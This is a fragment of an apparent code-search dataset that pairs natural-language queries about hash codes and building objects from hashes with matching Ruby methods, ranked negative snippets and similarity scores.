"def test_equality_simple\n value1_ = ::Versionomy.create(:major => 2, :minor => 0, :release_type => :alpha, :alpha_version => 5)\n value2_ = ::Versionomy.create(:major => 2, :release_type => :alpha, :alpha_version => 5)\n assert_equal(value2_, value1_)\n assert_equal(value2_.hash, value1_.hash)\n end",
"def ==(other)\n other.is_a?(self.class) &&\n name == other.name &&\n attributes == other.attributes\n end",
"def changes(attrs1, attrs2)\n old_attrs = attrs1.slice(*GENERATED_ATTRS)\n new_attrs = attrs2.slice(*GENERATED_ATTRS)\n\n return if old_attrs == new_attrs\n old_attrs.each do |k, v|\n next if new_attrs[k] == v\n @changes << Change.new(nil, k, v, new_attrs[k]) \n end\n end",
"def tdiff_equal(node)\n if (self.class == node.class)\n case node\n when Nokogiri::XML::Attr\n (self.name == node.name && self.value == node.value)\n when Nokogiri::XML::Element, Nokogiri::XML::DTD\n self.name == node.name\n when Nokogiri::XML::Text, Nokogiri::XML::Comment\n self.text == node.text\n when Nokogiri::XML::ProcessingInstruction\n (self.name == node.name && self.content = self.content)\n else\n false\n end\n else\n false\n end\n end",
"def ==(other)\n name == other.name &&\n color == other.color &&\n age == other.age\n end",
"def more_desirable?(attribute_id1, attribute_id2)\n attribute_id1 < attribute_id2\n end",
"def isSame(tab)\n for x in 0..3\n for y in 0..3\n return(false) if (self.val(x,y) != tab.val(x,y)) ;\n end\n end\n return true ;\n end",
"def ==(other)\n # If the classes don't match, they cannot possibly be equal.\n if self.class != other.class\n return false\n end\n\n # If the persisted state doesn't match, they also can never be equal.\n if persisted? != other.persisted?\n return false\n end\n\n # When persisted, check the other's id to see if it's the same,\n # cannot possible be equals if they have different ids.\n if persisted? && id != other.id\n return false\n end\n\n # Finally, compare the attributes hash. If all key/values match,\n # they are considered equal.\n attributes == other.attributes\n end",
"def ==(other)\n self.class == other.class &&\n attributes[\"_id\"] == other.attributes[\"_id\"]\n end",
"def assert_same_values(expected, actual)\n actual.each_pair do |k,v|\n next unless expected[k]\n assert_equal expected[k], v, \"Values for #{k} are not matching\"\n end\n end",
"def assert_equivalent_xml(expected, actual)\n expected_xml = Nokogiri::XML(\"<test-xml>\\n#{expected}\\n</test-xml>\")\n actual_xml = Nokogiri::XML(\"<test-xml>\\n#{actual}\\n</test-xml>\")\n ignored_attributes = %w(style data-disable-with)\n\n equivalent = EquivalentXml.equivalent?(expected_xml, actual_xml, {\n ignore_attr_values: ignored_attributes\n }) do |a, b, result|\n if result === false && b.is_a?(Nokogiri::XML::Element)\n if b.attr('name') == 'utf8'\n # Handle wrapped utf8 hidden field for Rails 4.2+\n result = EquivalentXml.equivalent?(a.child, b)\n end\n if b.delete('data-disable-with')\n # Remove data-disable-with for Rails 5+\n # Workaround because ignoring in EquivalentXml doesn't work\n result = EquivalentXml.equivalent?(a, b)\n end\n if a.attr('type') == 'datetime' && b.attr('type') == 'datetime-local'\n a.delete('type')\n b.delete('type')\n # Handle new datetime type for Rails 5+\n result = EquivalentXml.equivalent?(a, b)\n end\n end\n result\n end\n\n assert equivalent, lambda {\n # using a lambda because diffing is expensive\n Diffy::Diff.new(\n sort_attributes(expected_xml.root),\n sort_attributes(actual_xml.root)\n ).to_s(:color)\n }\n end",
"def sync_duplicate_obj_attributes(obj1, obj2)\n duplicate_keys.each do |key|\n unless obj1[key].blank? && obj2[key].blank?\n if obj1[key].blank?\n obj1.send(\"#{key}=\", obj2[key])\n elsif obj2[key].blank?\n obj2.send(\"#{key}=\", obj1[key])\n else # Each obj has a value\n if obj1[key] != obj2[key]\n raise ArgumentError, \"#{key} attribute values on the two objects don't match: #{obj1[key]} vs #{obj2[key]}\"\n end\n end\n end\n end\n end",
"def eql?(other)\n return true if equal?(other)\n\n # two instances for different models cannot be equivalent\n return false unless other.kind_of?(model)\n\n # two instances with different keys cannot be equivalent\n return false if key != other.key\n\n # neither object has changed since loaded, so they are equivalent\n return true if repository == other.repository && !dirty? && !other.dirty?\n\n # get all the loaded and non-loaded properties that are not keys,\n # since the key comparison was performed earlier\n loaded, not_loaded = properties.select { |p| !p.key? }.partition do |property|\n attribute_loaded?(property.name) && other.attribute_loaded?(property.name)\n end\n\n # check all loaded properties, and then all unloaded properties\n (loaded + not_loaded).all? { |p| p.get(self) == p.get(other) }\n end",
"def assert_event_are_light_equal e1, e2\n return false if e1.class != e2.class\n\n [:subject, :event, :moodid,\n :mood, :music, :location, :taglist, :pickeyword,\n :preformatted, :backdated, :comments, :security, :allowmask,\n :screening,].each do |attr|\n return false if e1.send(attr) != e2.send(attr)\n end\n\n e1.compare_time(e2)\n end",
"def eql(expected)\n set_relativity(:eql, expected)\n end",
"def modified?( original )\n DATA_ATTRIBUTES.any? { |e| send( e ) != original.send( e )}\n end",
"def ==(other)\n @name == other.name && @amount == other.amount\n end",
"def ==(other)\n other.kind_of?(self.class) &&\n @name == other.name && @columns == other.columns && @unique == other.unique?\n end",
"def match_same_name_attributes(*options)\n\n options = options.extract_options!\n same_name_attributes = @from_table.columns.map(&:name) & @to_table.columns.map(&:name)\n\n if same_name_attributes\n same_name_attributes = columns_from_options(same_name_attributes, options)\n same_name_attributes.each do |same_name_attribute|\n from same_name_attribute, :to => same_name_attribute\n end\n end\n end",
"def equal_pair(key, request)\n if @event[\"required\"][key] == request[\"object_attributes\"][key] || event[\"required\"][key] == \"\"\n true\n else\n false\n end\n end",
"def assert_equal(att, value, error = [att, :not_equal])\n assert value === send(att), error\n end",
"def validate\n matched = {}\n duplicated_attributes = []\n attributes.each do |attribute|\n if matched.has_key?(attribute.name) && matched[attribute.name] == attribute.name_format\n duplicated_attributes << attribute.name unless duplicated_attributes.include?(attribute.name)\n else\n matched[attribute.name] = attribute.name_format\n end\n end\n if !duplicated_attributes.empty?\n raise ValidationError, \"An attribute with the same name and name format may only be specified once. The following attributes were specified multiple times: #{duplicated_attributes.join(',')}\"\n end\n end"
] |
[
"0.7291717",
"0.7188103",
"0.70395297",
"0.7007927",
"0.68874705",
"0.6861532",
"0.6707156",
"0.6660597",
"0.66147524",
"0.658478",
"0.6584619",
"0.6580019",
"0.65543133",
"0.6543933",
"0.65068495",
"0.6479513",
"0.6456241",
"0.6415999",
"0.6412208",
"0.6412208",
"0.6412208",
"0.6411266",
"0.6380575",
"0.63775986",
"0.6260147",
"0.6246534",
"0.6240681",
"0.62150854",
"0.62014365",
"0.6186426",
"0.61837834",
"0.6164858",
"0.61304426",
"0.61149454",
"0.6097789",
"0.6083095",
"0.6078927",
"0.6067201",
"0.60053444",
"0.59974694",
"0.5994989",
"0.5991373",
"0.59856457",
"0.5985243",
"0.5977118",
"0.59521115",
"0.59428704",
"0.59311265",
"0.59247756",
"0.5921222",
"0.5921222",
"0.59095234",
"0.58795947",
"0.58789194",
"0.5870439",
"0.58598673",
"0.58571184",
"0.5856412",
"0.5855177",
"0.58480394",
"0.5847516",
"0.58370507",
"0.5799985",
"0.5795313",
"0.57880926",
"0.57823527",
"0.57788265",
"0.5776185",
"0.57670164",
"0.5759791",
"0.5758563",
"0.5753949",
"0.57518554",
"0.5750137",
"0.57385117",
"0.57309806",
"0.5729126",
"0.572618",
"0.57250285",
"0.57210624",
"0.5712646",
"0.5710082",
"0.57059866",
"0.57036847",
"0.5702592",
"0.5690256",
"0.5674193",
"0.56433815",
"0.5641553",
"0.56216776",
"0.56148046",
"0.5591313",
"0.5587681",
"0.55836356",
"0.5569298",
"0.5550885",
"0.5546161",
"0.5545665",
"0.55422115",
"0.5539372",
"0.5529004"
] |
0.0
|
-1
|
Calculates hash code according to all attributes.
|
def hash
[year, make, model, trim, short_trim, body_type, body_subtype, vehicle_type, transmission, drivetrain, fuel_type, engine, engine_size, engine_block, doors, cylinders, made_in, steering_type, antibrake_sys, tank_size, overall_height, overall_length, overall_width, std_seating, opt_seating, highway_miles, city_miles, engine_measure, engine_aspiration, trim_r].hash
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def attr_hash\n Digest::MD5.hexdigest(\"#{@name}:#{@ruby_type}\")\n end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash\n code = 17\n code = 37*code + @x.hash\n code = 37*code + @y.hash\n # Add lines like this for each significant instance variable\n code # Return the resulting code\n end",
"def hash(*) end",
"def hash\n code = 17\n code = 37 * code\n self.instance_variables.each do |v|\n code += self.instance_variable_get(v).hash\n end\n code\n end",
"def hash_code; end",
"def calculate_hash!\n prefix = PREFIX_NAME_LOOKUP[self.type]\n # add special cases for refs\n self.hash_id = NodeId.sha1(\"#{prefix} #{self.size}\\0#{self.content}\")\n end",
"def hash() #:nodoc:\n prime = 31;\n result = 1;\n result = prime * result + @amount.to_i\n result = prime * result + @new_balance.to_i\n result = prime * result + (@date.nil? ? 0 : Bankjob.date_time_to_ofx(@date).hash);\n result = prime * result + (@raw_description.nil? ? 0 : @raw_description.hash);\n result = prime * result + (@type.nil? ? 0 : @type.hash);\n # don't use value date\n return result;\n end",
"def hash\n prime = 31\n result = 1\n result = result * prime + (@decision_target == nil ? 0 : @decision_target.hash)\n result = prime * result + (@string_id == nil ? 0 : @string_id.hash)\n result\n end",
"def hash\n @hash ||= begin\n result = 17\n result = 31 * result + self.class.hash\n result = 31 * result + ord\n result.is_a?(Fixnum) ? result : result.hash\n end\n end",
"def hash\n @hash ||= begin\n result = 17\n result = 31 * result + self.class.hash\n result = 31 * result + ord\n result.is_a?(Fixnum) ? result : result.hash\n end\n end",
"def hash; map{|el| \"#{el.name} @ #{el.hash}\"}; map(&:hash).reduce(:+) % 2**32; end",
"def hash\r\n a = 0\r\n @id.each_byte {|c| a += c.to_i}\r\n (a + @paired.to_i) * HASH_PRIME\r\n end",
"def hash\n raw = [name, type, values.join('/')].join(' ')\n Digest::MD5.hexdigest(raw)\n end",
"def hash\n size.hash ^ rank.hash\n end",
"def hash\n \"#{self.class.name}-#{self.id}-#{@__metadata__.cas}-#{@__attributes__.hash}\".hash\n end",
"def hash\n @hash || calculate_hash!\n end",
"def hash\n return name.hash ^ direction.hash ^ lhs.hash ^ rhs.hash\n end",
"def hash\n value = 0\n my_rows = @rows\n r_size = my_rows.size\n for i in 0..r_size-1 do\n a_row = my_rows[i]\n a_size = a_row.size\n for j in 0..a_size-1 do\n value ^= a_row[j].hash\n end\n end\n return value\n end",
"def hash\n id.hash + 32 * bs_request.hash\n end",
"def do_hash(input)\n a = OpenSSL::Digest.hexdigest(\"SHA224\", input).to_i % 19\n b = OpenSSL::Digest.hexdigest(\"SHA512\", input).to_i % 19\n [a, b]\n end",
"def hash\n type.hash ^ (id.hash >> 1)\n end",
"def hash\n [self.class, self.val, self.attribute].hash\n end",
"def hash\n 0\n end",
"def hash # :nodoc:\n identifier.hash ^ requirement.hash\n end",
"def hash\n self.class.hash ^ key_attributes.hash\n end",
"def hash\n return super unless has_size?\n\n res = 0\n each do |el|\n res += el.hash\n end\n return res\n end",
"def hash\n h = @e.nil? ? 0 : @e\n h = (h << 1) ^ @r.hash\n h = (h << 1) ^ @v.hash\n end",
"def hash() source.hash ^ (target.hash+1); end",
"def hash() source.hash ^ (target.hash+1); end",
"def hash\n\t\t\"#{@x}#{@y}\".hash\n\tend",
"def hash #:nodoc:\n __getobj__.hash ^ self.class.hash\n end",
"def hash\n Zlib.crc32(to_a.map(&:to_s).sort.to_s)\n end",
"def hash_code\n prime = 31\n result = 1\n result = prime * result + x\n result = prime * result + y\n return result;\n end",
"def hash\n self.class.hash ^ operand.hash\n end",
"def hash!\n\t\t@@email.downcase!\n\t\thash = Digest::MD5.hexdigest(@@email)\n\t\treturn hash\n\tend",
"def hash\n [anchor, cv, nullifier, proof, rk, spend_auth_sig].hash\n end",
"def hash\n ([self.class] + self.class.comparison_attrs.map{|x| send(x)}).hash\n end",
"def hash\n @symbols.hash + 37*positive?.hash\n end",
"def calculate_unique_hash\n unique = ''\n unique += self.content if self.content.present?\n unique += self.summary if self.summary.present?\n unique += self.title if self.title.present?\n self.unique_hash = Digest::MD5.hexdigest unique\n end",
"def hash()\n #This is a stub, used for indexing\n end",
"def hash\n # Memoizing such a simple hash value seems silly, however the\n # profiler showed the Card#hash method as having 22% of the runtime. My\n # memoizing the hash value that was reduced to 12%.\n return @hash unless @hash.nil?\n @hash = @value.hash ^ @suit.hash\n end",
"def hash=(_arg0); end",
"def block_hash\n\t\tdigest = Digest::SHA2.new\n\n\t\tdigest << '%d' % [ self.index ]\n\t\tdigest << self.timestamp.strftime( '%s%N' )\n\t\tdigest << self.payload\n\t\tdigest << self.payload_hash\n\t\tdigest << self.proof.to_s\n\t\tdigest << self.previous_hash\n\t\t\n\t\treturn digest.hexdigest\n\tend",
"def hash\n num = 0\n self.each do |k,v|\n if k.is_a?(Integer) && v.is_a?(Integer)\n num += k * 26 + v\n elsif k.is_a?(Integer) && !v.is_a?(Integer)\n num += k * 26 + ALPHA_NUMBERS[v.to_s.downcase]\n elsif v.is_a?(Integer) && !k.is_a?(Integer)\n num += v * 26 + ALPHA_NUMBERS[k.to_s.downcase]\n elsif !k.nil? && !v.nil?\n num += ALPHA_NUMBERS[k.to_s.downcase] * ALPHA_NUMBERS[v.to_s.downcase]\n end\n end\n num\n end",
"def hash\r\n\t\treturn @name.hash() + @type.hash()\r\n\tend",
"def hash\n return @hash_code if defined? @hash_code\n @hash_code = usual_equal_object.hash\n end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash\n [oct, pc].hash\n end",
"def hash\n excl = @excl ? 1 : 0\n hash = excl\n hash ^= @begin.hash << 1\n hash ^= @end.hash << 9\n hash ^= excl << 24;\n # Are we throwing away too much here for a good hash value distribution?\n return hash & Fixnum::MAX\n end",
"def hash\n code.hash\n end",
"def hash # :nodoc:\n name.hash ^ type.hash ^ requirement.hash\n end",
"def hash\n @vbits.hash\n end",
"def hash\n Digest::SHA256.hexdigest( \"#{nonce}#{time}#{difficulty}#{prev}#{data}\" )\n end",
"def hash\n if @sha512hash != nil\n return @sha512hash.to_i(16)\n else\n super\n end\n end",
"def calc_hash(pass)\n salt_cost = SCrypt::Engine.autodetect_cost(self[:salt])\n SCrypt::Engine.scrypt(pass, self[:salt], salt_cost, 32).unpack('H*').first\n end",
"def hash\n [lac, cid, radio, mcc, mnc, signal, psc, asu, ta].hash\n end",
"def calculate_checksum\n last_checksum = previous_event&.checksum\n attrs = attributes.except(\"checksum\", \"id\", \"updated_at\").merge(last_checksum: last_checksum)\n cs = Digest::SHA256.hexdigest(attrs.to_s)\n puts \"#{id} calculate_checksum: #{cs} <- #{attrs} \" if Rails.env.development?\n Rails.logger.info(\"#{id} calculate_checksum: #{cs} <- #{attrs} \")\n return cs\n end",
"def hash\n code.hash\n end",
"def hash\n\t\t[@a, @b, self.class::D].hash\n\tend",
"def consistent_hash\n Zlib.crc32(self.to_yaml, 0)\n end",
"def hash\n @hash[:perm_type].hash ^\n @hash[:perms].hash ^\n @hash[:inheritance].hash ^\n @hash[:target].hash\n end",
"def hash( *strs )\n return Digest::MD5.hexdigest( strs.join )\n end",
"def hash\n @rank.hash ^ @suit.hash\n end",
"def hash\n return Digest::MD5.hexdigest(self.describe(' '))\n end",
"def hash\n @real.hash ^ @image.hash\n end",
"def to_hash() end",
"def hash_length\n super\n end",
"def hash_hash(h)\n require 'digest/md5'\n Digest::MD5.hexdigest(Marshal::dump(h.sort))\n end",
"def hash() source.hash ^ target.hash; end",
"def hash\n [first_name, last_name, address_one, address_two, city, state, zip, phone, email, country_code].hash\n end",
"def calculate_hash(input, prep_hashes)\n result = 0\n input.unpack('U*').each do |x|\n result += prep_hashes.hash(x)\n end\n (result % MOD_VALUE).to_s(HEX)\nend",
"def c_hash\n sha256 = Digest::SHA256.new\n token = @code.token.token\n hashed_token = sha256.digest(token)\n first_half = hashed_token[0...hashed_token.length / 2]\n Base64.urlsafe_encode64(first_half).tr('=', '')\n end",
"def hash(block)\n Digest::SHA256.hexdigest(block.to_s.encode)\n end",
"def calculate_hash\n\t\toptions = {:firstname => firstname, :email => email, :phone => phone, :txnid => txnid, :surl => surl, :furl => furl, :productinfo => productinfo, :amount => amount}\n\t\tservice = PayuIndia::Helper.new(payment_gateway_key, payment_gateway_salt, options)\n\t\tself.hast = service.generate_checksum\n\tend",
"def hash\n [rank, suit].hash\n end",
"def hash\n self.class.hash ^ left.hash ^ right.hash\n end",
"def generate_hash(*args)\n Digest::SHA3.hexdigest(args.join(''))\n end",
"def hash_code\n hash_code = {}\n self.seq.each do |letter|\n hash_code.keys.include?(letter) ? hash_code[letter] += 1 : hash_code[letter] = 1\n end\n hash_code\n end",
"def hashify_attributes(attrs)\n Hash.new.tap{ |h| attrs.each{|a| h[a] = self.send(a)} }\n end",
"def hash\n\n self.h.fei.hash\n end",
"def hash\n shasum.hash\n end",
"def hash\n shasum.hash\n end",
"def hash\n shasum.hash\n end",
"def hash\n attributes.hash\n end",
"def hash\n attributes.hash\n end"
] |
[
"0.7118691",
"0.70400536",
"0.70400536",
"0.70400536",
"0.70400536",
"0.70400536",
"0.70400536",
"0.70400536",
"0.68960655",
"0.67847186",
"0.6707762",
"0.670052",
"0.6688737",
"0.66705376",
"0.6489735",
"0.6462376",
"0.6462376",
"0.64444333",
"0.6413127",
"0.6395483",
"0.63898623",
"0.6372129",
"0.635671",
"0.63370055",
"0.62682766",
"0.62533766",
"0.6246914",
"0.6230963",
"0.62173444",
"0.6214272",
"0.6214131",
"0.61962456",
"0.619165",
"0.61866295",
"0.6185355",
"0.6185355",
"0.6153702",
"0.6145376",
"0.6144877",
"0.6139152",
"0.6128312",
"0.61224943",
"0.61217207",
"0.61205214",
"0.61041045",
"0.61000645",
"0.60937095",
"0.60931146",
"0.60818595",
"0.60811466",
"0.60500103",
"0.60322344",
"0.6022704",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.6020012",
"0.60178953",
"0.6014942",
"0.5997442",
"0.59880185",
"0.598736",
"0.59799886",
"0.5972682",
"0.5969595",
"0.5969411",
"0.59594935",
"0.5957466",
"0.59423596",
"0.5942144",
"0.59245354",
"0.5924357",
"0.5904946",
"0.59025365",
"0.58536685",
"0.5847055",
"0.58454466",
"0.5845053",
"0.58447546",
"0.5844059",
"0.5842638",
"0.5840575",
"0.58391696",
"0.5825819",
"0.5824118",
"0.5823615",
"0.58184344",
"0.5815284",
"0.58124787",
"0.5810309",
"0.5808056",
"0.5808056",
"0.5808056",
"0.5806852",
"0.5806852"
] |
0.0
|
-1
|
Builds the object from hash
|
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def build(hash)\n obj = new\n hash.each_pair do |k,v|\n obj[k] = v if variables[k]\n end\n return obj\n end",
"def build_from_hash(attributes)\n\n end",
"def build_from_hash(hash)\n instance = self.new\n\n # Add the instance attributes dynamically from the hash. If the attribute\n # does not already exist, then don't re-add the attribute class and\n # variable, just set it with the value from the hash\n hash.keys.each do |key|\n class_eval { attr_accessor key } unless instance.methods.include?(key.to_sym)\n instance.instance_variable_set \"@#{key}\", hash[key]\n end\n\n instance\n end",
"def build(hash, track_changes = true)\n resource = fields.each_with_object(new) do |field, r|\n value = hash.fetch(field.to_s, hash[field.to_sym])\n r.send(\"#{field}=\", value)\n end\n resource.clear_changes! unless track_changes\n resource\n end",
"def initialize hash\n @hash = hash\n end",
"def build(params)\n return new(params) if params.is_a?(Hash)\n raise(\"unexpected parameter, expected Hash, received #{params.class}\")\n end",
"def initialize( hash )\n\t\t\t@hash = hash.dup\n\t\t\t@dirty = false\n\t\tend",
"def initialize(a_hash)\n from_h(a_hash)\n end",
"def initialize\n\t\t\t@hash = {}\n\t\tend",
"def initialize(hash)\n @hash = hash\n @converted = {}\n end",
"def initialize(hash)\n @short_code = hash[\"short_code\"]\n @name = hash[\"name\"]\n @id = hash[\"id\"]\n end",
"def initialize(hash)\n super(hash)\n end",
"def initialize\n @h = new_hash\n end",
"def new_from_hash(hash)\n if hash == nil\n self.class.new.assign(self)\n else\n hash_obj = hash\n if hash.instance_of?(Hash)\n hash_obj = self.class.new\n merge_hash_into_object(hash, hash_obj)\n end\n instance = self.class.new\n object_assign(instance, hash_obj)\n end\n end",
"def initialize(hash={})\n @hash = hash\n end",
"def initialize\n @hash = {}\n end",
"def initialize\n @hash = {}\n end",
"def initialize(hash)\r\n hash.each { |k, v|\r\n # Create getters and setters\r\n self.class.attr_accessor(k)\r\n # Set value for created variable\r\n self.send(\"#{k}=\", v)\r\n }\r\n self.class.all.push(self)\r\n end",
"def build!(hash)\n hash.must(::Hash) { raise ArgumentError, \"#{self} expects Hash, but got #{hash.class}\" }\n\n if hash.size != variables.size\n keys1 = variables.keys\n keys2 = hash.keys.map(&:to_s)\n minus = (keys1 - keys2).map{|i| \"-#{i}\"}\n plus = (keys2 - keys1).map{|i| \"+#{i}\"}\n \n msg = \"#{self} expects #{variables.size}, but got #{hash.size} (%s)\" % (minus + plus).join(\",\")\n raise Typed::SizeMismatch, msg\n end\n\n # 'build' just ignore unknown fields, but 'build!' raise errors\n obj = new\n hash.each_pair do |k,v|\n obj[k] = v\n end\n return obj\n end",
"def initialize(hash)\n @cw_id = hash[\"cw_id\"]\n @cik = hash[\"cik\"]\n @name = hash[\"company_name\"]\n @irs_number = hash[\"irs_number\"]\n @sic_code = hash[\"sic_code\"]\n @industry = hash[\"industry_name\"]\n @sic_sector = hash[\"sic_sector\"]\n @sector_name = hash[\"sector_name\"]\n @source_type = hash[\"source_type\"]\n @address = hash[\"raw_address\"]\n @country = hash[\"country_code\"]\n @state = hash[\"subdiv_code\"]\n @top_parent_id = hash[\"top_parent_id\"]\n @num_parents = hash[\"num_parents\"]\n @num_children = hash[\"num_children\"]\n @max_year = hash[\"max_year\"]\n @min_year = hash[\"min_year\"]\n end",
"def from_hash(hash)\n instance = allocate\n instance.instance_variable_set :@attributes, hash.freeze\n instance\n end",
"def from_hash(hash)\n hash = DEFAULTS.merge(hash)\n hash['spdx_id'] = hash.delete('spdx-id')\n ordered_array = hash.values_at(*members.map(&:to_s))\n new(*ordered_array)\n end",
"def initialize(hash=nil)\n @table = HashWithIndifferentAccess.new\n\n for k,v in hash\n @table[k] = v\n new_ostruct_member(k)\n end if hash\n end",
"def from_hash(hash)\n hash.each_pair do |key, value|\n\n # We need to catch hashes representing child objects\n # If the hash key:value is a of a Hash/BSON:Ordered hash\n if hash[key].class == Hash || hash[key].class == BSON::OrderedHash\n # If we have a classname we know we need to return to an object\n if hash[key][\"@classname\"]\n self.instance_variable_set(key, ::Object::full_const_get(hash[key][\"@classname\"]).new(hash[key])) unless key.to_s.start_with?(\"_\")\n else\n self.instance_variable_set(key, value) unless key.to_s.start_with?(\"_\")\n end\n else\n self.instance_variable_set(key, value) unless key.to_s.start_with?(\"_\")\n end\n end\n end",
"def from_hash(hash)\n hash.each_pair do |key, value|\n\n # We need to catch hashes representing child objects\n # If the hash key:value is a of a Hash/BSON:Ordered hash\n if hash[key].class == Hash || hash[key].class == BSON::OrderedHash\n # If we have a classname we know we need to return to an object\n if hash[key][\"@classname\"]\n self.instance_variable_set(key, ::Object::full_const_get(hash[key][\"@classname\"]).new(hash[key])) unless key.to_s.start_with?(\"_\")\n else\n self.instance_variable_set(key, value) unless key.to_s.start_with?(\"_\")\n end\n else\n self.instance_variable_set(key, value) unless key.to_s.start_with?(\"_\")\n end\n end\n end",
"def initialize(hash)\n @hash = hash\n @data = resourcify_data\n end",
"def from_hash hash\n @id= hash['id']\n\n @admin= hash['admin']\n @username= hash['username']\n @timezone= hash['timezone']\n @email_address= hash['email_address']\n\n @password = nil\n\n @created_at= DateTime.parse(hash['created_at'])\n @updated_at= DateTime.parse(hash['updated_at'])\n end",
"def hash_to_obj hash\n OpenStruct.new(hash) rescue raise ConfigError, \"Can't convert setup to object\"\n end",
"def initialize(hash)\n load_hash(hash)\n end",
"def from_hash( h)\n\t\th.each { |name,attributes|\n\t\t\tklass = Klass.new\n\t\t\tklass.from_hash( { name => attributes } )\n\t\t\tself.add_class( klass)\n\t\t}\n\n\t\t# this is an experiment in handling \"through\" attributes\n\t\t# i.e. enriching the model with the join classes\n\tend",
"def initialize(*args)\n super\n # hash = {}\n end",
"def build_object(resp)\n return resp unless resp.respond_to?(:merge)\n @build_object ||= final_object_class.new(resp.merge(additional_hash_to_serialize_after_response))\n end",
"def from_hash(hash)\n ordered_array = hash.values_at(*members.map(&:to_s))\n new(*ordered_array)\n end",
"def __convert hash #:nodoc:\n instance = self.class.new\n hash.each do |k, v|\n k = k.to_s if !k.respond_to?(:to_sym) && k.respond_to?(:to_s)\n instance.new_ostruct_member k\n if v.is_a?(Hash)\n v = v[\"type\"] == \"hash\" ? v[\"contents\"] : __convert(v)\n elsif v.is_a?(Array)\n v = v.map{|e| e.instance_of?(Hash) ? __convert(e) : e}\n end\n instance.send \"#{k}=\".to_sym, v\n end\n instance\n end",
"def initialize(hash)\n\t\t@id = hash['id']\n\t\t@first_name = hash['first_name']\n\t\t@last_name = hash['last_name']\n\t\t@mentor = hash['mentor']\n\tend",
"def initialize(hash={})\n @name = validate_name(hash[:name])\n @description = hash[:description]\n @snmp_opts = hash[:snmp_opts]\n\n save # Save a copy of self to Redis on creation\n end",
"def initialize\n @hash_dict = {}\n end",
"def initialize(hash=nil)\n @attributes = hash\n @attributes ||= {}\n end",
"def initialize(hash={})\n self.init_attrs_from_hash(hash)\n end",
"def from_hash(hash)\n apply_nested_hash(hash)\n end",
"def initialize(hash)\n # @id = hash[\"id\"]\n # @street_address = hash[\"street_address\"]\n # @city = hash[\"city\"]\n # @state = hash[\"state\"]\n # @zipcode = hash[\"zipcode\"]\n # @country = hash[\"country\"]\n\n #add in correct details\n end",
"def from_hash(hash)\n @data_object.user_acc_name = hash['user_acc_name']\n @data_object.user_affiliate = hash['user_affiliate']\n @user_over_13 = hash['user_over_13']\n\n contact.from_hash(hash)\n end",
"def initialize(hash)\n @name = hash[\"campaign\"] #decided to change it to \"name\" since this is the campaign class\n date_elements = hash[\"date\"].split(\"/\") #date is being passed in as a string, need this array to create the Date object in the next line\n @date = Date.new(date_elements[2].to_i + 2000, date_elements[0].to_i, date_elements[1].to_i) #added 2000 to year since the program was considering it as the year 15; this creates the date object\n @spend = hash[\"spend\"].to_f #use .to_f to make sure spend comes in as a float instead of a string\n @impressions = hash[\"impressions\"].to_i #need it as an integer for counting purposes later\n @actions = JSON.parse(hash[\"actions\"])#ensures that each action comes in as an array instead of a string\n @@all << self #shovels it into the all array\n end",
"def initialize(hash)\n hash.each do |k, v|\n self.send(\"#{k}=\", v) if self.respond_to?(\"#{k}=\")\n end\n @id = hash[\"id\"]\n end",
"def initialize (hash)\n hash.each {|key, value|\n self.class.attr_accessor(key)\n self.send((\"#{key}=\"), value)\n }\n @@all << self\n end",
"def initialize(hash={})\n @data = Hash.new\n hash.each do |key, value|\n self[key] = value\n end\n end",
"def create_from_hash(hash, opts={})\n create_opts = update_or_create_options(hash, opts)\n create { |instance| instance.set(create_opts) }\n end",
"def initialize(hash={})\n # assign the attributes here (???)\n hash.each do |k, v| # name = id, name, etc.\n self.send(\"#{k}=\", v)\n # self.k = v # there's no '.k' method\n #binding.pry\n end\n end",
"def initialize(hash) #.new\n @name = hash[:name][0]\n @region = hash[:region]\n @population = hash[:population]\n @capital = hash[:capital]\n @flag_link = hash[:flag_link]\n @@all << self\n #binding.pry\n end",
"def initialize(hash = {})\n super(hash)\n\n @action = extract_value(hash, :action)\n @clientId = extract_value(hash, :clientId)\n @clientIdAlias = extract_value(hash, :clientIdAlias)\n @clientIdAliasUsed = extract_boolean_value(hash, :clientIdAliasUsed)\n @expiresAt = extract_integer_value(hash, :expiresAt)\n @subject = extract_value(hash, :subject)\n @scopes = extract_value(hash, :scopes)\n @existent = extract_boolean_value(hash, :existent)\n @usable = extract_boolean_value(hash, :usable)\n @sufficient = extract_boolean_value(hash, :sufficient)\n @refreshable = extract_boolean_value(hash, :refreshable)\n @responseContent = extract_value(hash, :responseContent)\n @properties = extract_array_value(hash, :scopes) do |element|\n Authlete::Model::Property.parse(element)\n end\n end",
"def initialize( hash )\n\t\t@object_classes = self.parse_objectclasses( hash['objectClasses'] || [] )\n\t\t@attribute_types = self.parse_attribute_types( hash['attributeTypes'] || [] )\n\t\t@ldap_syntaxes = self.parse_ldap_syntaxes( hash['ldapSyntaxes'] || [] )\n\t\t@matching_rules = self.parse_matching_rules( hash['matchingRules'] || [] )\n\t\t@matching_rule_uses = self.parse_matching_rule_uses( hash['matchingRuleUse'] || [] )\n\tend",
"def from_hash(hash)\n super(hash)\n verify\n end",
"def objects_from_serialized_hash(hash) # :nodoc:\n klass, attributes = Helpers.to_class_and_attributes(hash)\n klass.from_seedable_attributes(attributes)\n end",
